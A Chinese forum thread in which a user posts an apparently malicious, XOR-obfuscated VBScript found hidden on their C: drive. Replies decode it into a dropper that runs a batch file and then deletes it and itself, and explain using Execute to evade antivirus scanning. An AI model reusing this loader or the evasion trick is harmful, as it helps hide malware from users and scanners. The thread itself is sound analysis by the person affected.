回 帖 发 新 帖 刷新版面

主题:MircoSoft.vbs

今天发现C盘根目录下有两个隐藏文件
MircoSoft.bat  (这个文件应该不是BAT文件,用记事本打开来是二进制代码)
MircoSoft.vbs  
第二个文件用记事本打开后内容如下:

Function fan(ntD)
For i=1 to Len(ntD) Step 2
fan=fan & Chr(CLng("&H" & Mid(ntD,i,2)) Xor 23)
Next
End Function
Nrb="587937526565786537457264627A723759726F631A1D44726337447F727B7B372A3754657276637258757D7274633F35406474657E676339447F727B7B353E1A1D447F727B7B396562793F35742D4B7A7E746578647871636439757663353E1A1D64726337447F727B7B2A5978637F7E79701A1D44726337716478372A3754657276637258757D7274633F354474657E67637E797039517E7B72446E6463727A58757D727463353E1A1D404474657E676339447B7272673726272727371A1D5E713771647839517E7B72526F7E6463643F35742D4B7A7E746578647871636439757663353E37437F7279377164783953727B726372517E7B723F35742D4B7A7E746578647871636439757663353E1A1D7164783953727B726372517E7B723F404474657E6763394474657E676359767A723E"
EXEC fan(Nrb)

回复列表 (共6个回复)

沙发

第二个文件的主要内容是:
On Error Resume Next
Set Shell = CreateObject("Wscript.Shell")
Shell.run("c:\microsofts.bat")
set Shell=Nothing
Set fso = CreateObject("Scripting.FileSystemObject")
WScript.Sleep 1000 
If fso.FileExists("c:\microsofts.bat") Then fso.DeleteFile("c:\microsofts.bat")
fso.DeleteFile(WScript.ScriptName)

板凳

作了加密处理?病毒吧?

3 楼

我尝试了几次,
VBS里是没有EXEC这个命令的,
也许是一个自定义过程.

但我当时因为那个BAT文件的存在,所以不敢运行,
而把那个EXEC改成了MSGBOX,然后得到一楼的代码.

然后又想到VBS的函数运算是从右到左的,
比如是:
EXEC MSGBOX(123)
明明第一个关键字无效,还是需要先计算后一个函数值后才会出错.
再加上那一行 On Error

但让我想不明白的是,代码已经全部在这里了,我删掉BAT文件后,
现在已经无法顺利运行了. 是不是我改了什么地方? 还是它本身是使用PECMD运行的?

4 楼

EXEC应该是一个过程,那段代码只是过程的参数。

5 楼

2)巧妙运用Execute函数 
   
  用过VBS程序的朋友是否会觉得奇怪:当一个正常程序中用到了FileSystemObject对象的时候,有些反病毒软件会在对这个程序进行扫描的时候报告说此Vbs文件的风险为高,但是有些VBS脚本病毒同样采用了FileSystemObject对象,为什么却又没有任何警告呢?原因很简单,就是因为这些病毒巧妙的运用了Execute方法。有些杀毒软件检测VBS病毒时,会检查程序中是否声明使用了FileSystemObject对象,如果采用了,这会发出报警。如果病毒将这段声明代码转化为字符串,然后通过Execute(String)函数执行,就可以躲避某些反病毒软件。 


这是我搜索到的。应该是EXECUTE方法吧?你确认你的代码不是这个?

6 楼

象execute "msgbox 1" 可以运行,可以把构成整个程序的字符串放到里面解析执行

我来回复

您尚未登录,请登录后再回复。点此登录或注册